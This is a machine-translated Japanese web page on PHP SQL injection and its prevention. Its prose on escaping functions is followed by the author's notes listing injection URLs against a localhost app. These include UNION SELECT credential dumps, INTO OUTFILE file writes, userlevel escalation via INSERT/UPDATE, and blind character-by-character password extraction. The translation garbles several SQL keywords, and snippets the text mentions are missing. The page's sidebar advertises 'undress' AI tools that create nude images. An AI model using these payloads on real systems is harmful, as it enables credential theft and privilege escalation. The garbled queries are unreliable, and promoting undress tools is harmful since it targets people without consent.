PHP SQL インジェクション攻撃と予防策
明らかに、データベースによって実行された最後のコマンドは次のとおりです。
これはデータベースに悲惨な結果をもたらします - すべてのレコードが削除されます。 ただし、使用しているデータベースが MySQL の場合、幸いなことに、mysql_query() 関数ではそのような操作を直接実行することはできません (複数のステートメントの操作を 1 行で実行することはできません)。安心してください。 使用されているデータベースが SQLite または PostgreSQL で、そのようなステートメントをサポートしている場合、悲惨な結果に直面することになります。 前述したように、SQL インジェクションは主に、攻撃の目的を達成するために、安全でないデータをデータベースに送信します。 SQLインジェクション攻撃を防ぐために、PHPには入力文字列を処理し、下位レベルで入力に対して事前のセキュリティ処理を実行できる機能、つまりMagic Quoteが搭載されています。 (php.ini magic_quotes_gpc)。 magic_quotes_gpc オプションが有効な場合、入力文字列内の単一引用符、二重引用符、およびその他の文字の前にバックスラッシュが自動的に付けられます。 しかし、Magic Quotes はあまり普遍的なソリューションではなく、すべての潜在的に危険な文字をブロックするわけではなく、Magic Quotes は多くのサーバーで有効になっていません。したがって、SQL インジェクションを防ぐために、他のさまざまな方法も使用する必要があります。 多くのデータベースは、この入力データ処理機能をネイティブに提供します。たとえば、PHP の MySQL 操作関数には、特殊文字やデータベース操作エラーの原因となる可能性のある文字をエスケープできる mysql_real_escape_string() という関数があります。 このコード:
上記の文字列形式のデータの前処理に加えて、バイナリデータをデータベースに保存する場合には、前処理にも注意する必要があります。そうしないと、データがデータベース自体の保存形式と競合し、データベースがクラッシュしたり、データ レコードが失われたり、データベース全体が失われたりする可能性があります。 PostgreSQL などの一部のデータベースは、バイナリ データのエンコードに特別に使用される関数 pg_escape_bytea() を提供しており、Base64 と同様にデータをエンコードできます。 例:
別のケースでは、そのようなメカニズムも使用される必要があります。 つまり、データベース システム自体がサポートしていない中国語、日本語などのマルチバイト言語です。 それらの一部には、バイナリ データ範囲と重複する ASCII 範囲があります。 ここでは、PHP SQL インジェクション防止に関する 2 つの記事をお勧めします。1 つは 360 Security によって提供され、もう 1 つは作成者によって収集された PHP SQL インジェクション防止コードです。これは非常に強力で使いやすいです。
ただし、データをエンコードすると、LIKE abc% などのクエリ ステートメントが無効になる可能性があります。 php SQLインジェクション実装(テストコードは安全です) SQL インジェクションの焦点は、SQL を柔軟に使用することによってのみ SQL ステートメントを構築することです。 ステートメントを使用して新しい注入文字列を構築します。勉強した後はメモを書き、いつでも使えるようにしています。まずは以下の内容をお読みいただければ幸いです SQL の基本原則を理解します。メモ内のコードはインターネットから取得したものです。 ===基本部分=== このテーブルをクエリします。 http://127.0.0.1/injection/user.php?username=angel' および LENGTH(パスワード)='6 http://127.0.0.1/injection/user.php?username=angel' および LEFT(password,1)='m 労働組合の声明: http://127.0.0.1/injection/show.php?id=1' Union select 1、ユーザー名、パスワード from user/* http://127.0.0.1/injection/show.php?id=' Union select 1,username,password from user/* ファイルをエクスポート: http://127.0.0.1/injection/user.php?username=angel' を出力ファイル 'c:/file.txt' に追加します http://127.0.0.1/injection/user.php?username=' または 1=1 を出力ファイル 'c:/file.txt http://127.0.0.1/injection/show.php?id=' ユーザーから出力ファイル 'c:/user.txt に 1、ユーザー名、パスワードを選択します INSERT ステートメント: INSERT INTO `user` (ユーザーID、ユーザー名、パスワード、ホームページ、ユーザーレベル) VALUES ('', '$username', '$password', '$homepage', '1'); ホームページ値の構築: http://jbxue.com', '3')# SQL ステートメントは次のようになります。 INSERT INTO `user` (ユーザー ID、ユーザー名、パスワード、ホームページ、ユーザーレベル) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3')#' 、'1'); 更新ステートメント: 私はこれが好きです まずはこのSQLを理解してください
このSQLを以下の形に修正すると、次にインジェクションを実装しました 1: ホームページの値を次のように変更します。 http://jbxue.com'、ユーザーレベル='3 SQL ステートメントは次のようになります。
ユーザーレベルとしてレベル 2: パスワード値を次のように変更します。
をコピーすると、SQL ステートメントは次のようになります
3: ID 値を次のように変更します。 ' またはユーザー名='管理者' SQL ステートメントは次のようになります。
===高度なセクション= == よく使用される MySQL 組み込み関数 データベース() ユーザー() SYSTEM_USER() SESSION_USER() 現在の使用者() データベース() バージョン() 部分文字列() ミッド() char() ロードファイル() … 機能の適用 記事を更新 SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 Union select 1,database(),version()
http://127.0.0.1/injection/user.php?userid=1 およびpassword=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1およびLEFT(password,1 )>char(100) http://127.0.0.1/injection/user.php?userid=1 および ord(mid(password,3,1))>111 データ構造内のフィールドの数とタイプを決定する http://127.0.0.1/injection/show.php?id=-1 ユニオン選択 1,1,1 http://127.0.0.1/injection/show.php?id=-1 Union select char(97),char(97),char(97) データテーブル名を推測してください http://127.0.0.1/injection/show.php?id=-1 メンバーから結合して 1,1,1 を選択します ユーザー名とパスワードを取得するためのクロステーブルクエリ http://127.0.0.1/ymdown/show.php?id=10000 Union select 1,ユーザー名,1,パスワード,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 (id=1 の ymdown_user から) その他 #最初のパスワードを確認する http://127.0.0.1/ymdown/show.php?id=10 ユニオン選択 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 (ymdown_user から) (id=1、ord(mid(password,1,1))=49 ===注射の予防=== サーバーの側面 magic_quotes_gpc がオンに設定されています display_errors はオフに設定されています コーディング面
|

ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

AI Hentai Generator
AIヘンタイを無料で生成します。

人気の記事

ホットツール

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック









JWTは、JSONに基づくオープン標準であり、主にアイデンティティ認証と情報交換のために、当事者間で情報を安全に送信するために使用されます。 1。JWTは、ヘッダー、ペイロード、署名の3つの部分で構成されています。 2。JWTの実用的な原則には、JWTの生成、JWTの検証、ペイロードの解析という3つのステップが含まれます。 3. PHPでの認証にJWTを使用する場合、JWTを生成および検証でき、ユーザーの役割と許可情報を高度な使用に含めることができます。 4.一般的なエラーには、署名検証障害、トークンの有効期限、およびペイロードが大きくなります。デバッグスキルには、デバッグツールの使用とロギングが含まれます。 5.パフォーマンスの最適化とベストプラクティスには、適切な署名アルゴリズムの使用、有効期間を合理的に設定することが含まれます。

記事では、PHP 5.3で導入されたPHPの後期静的結合(LSB)について説明し、より柔軟な継承を求める静的メソッドコールのランタイム解像度を可能にします。 LSBの実用的なアプリケーションと潜在的なパフォーマ

記事では、入力検証、認証、定期的な更新など、脆弱性から保護するためのフレームワークの重要なセキュリティ機能について説明します。

PHP開発でPHPのCurlライブラリを使用してJSONデータを送信すると、外部APIと対話する必要があることがよくあります。一般的な方法の1つは、Curlライブラリを使用して投稿を送信することです。

この記事では、フレームワークにカスタム機能を追加し、アーキテクチャの理解、拡張ポイントの識別、統合とデバッグのベストプラクティスに焦点を当てています。

PHP開発における固体原理の適用には、次のものが含まれます。1。単一責任原則(SRP):各クラスは1つの機能のみを担当します。 2。オープンおよびクローズ原理(OCP):変更は、変更ではなく拡張によって達成されます。 3。Lischの代替原則(LSP):サブクラスは、プログラムの精度に影響を与えることなく、基本クラスを置き換えることができます。 4。インターフェイス分離原理(ISP):依存関係や未使用の方法を避けるために、細粒インターフェイスを使用します。 5。依存関係の反転原理(DIP):高レベルのモジュールと低レベルのモジュールは抽象化に依存し、依存関係噴射を通じて実装されます。

セッションハイジャックは、次の手順で達成できます。1。セッションIDを取得します。2。セッションIDを使用します。3。セッションをアクティブに保ちます。 PHPでのセッションハイジャックを防ぐための方法には次のものが含まれます。1。セッション_regenerate_id()関数を使用して、セッションIDを再生します。2。データベースを介してストアセッションデータを3。
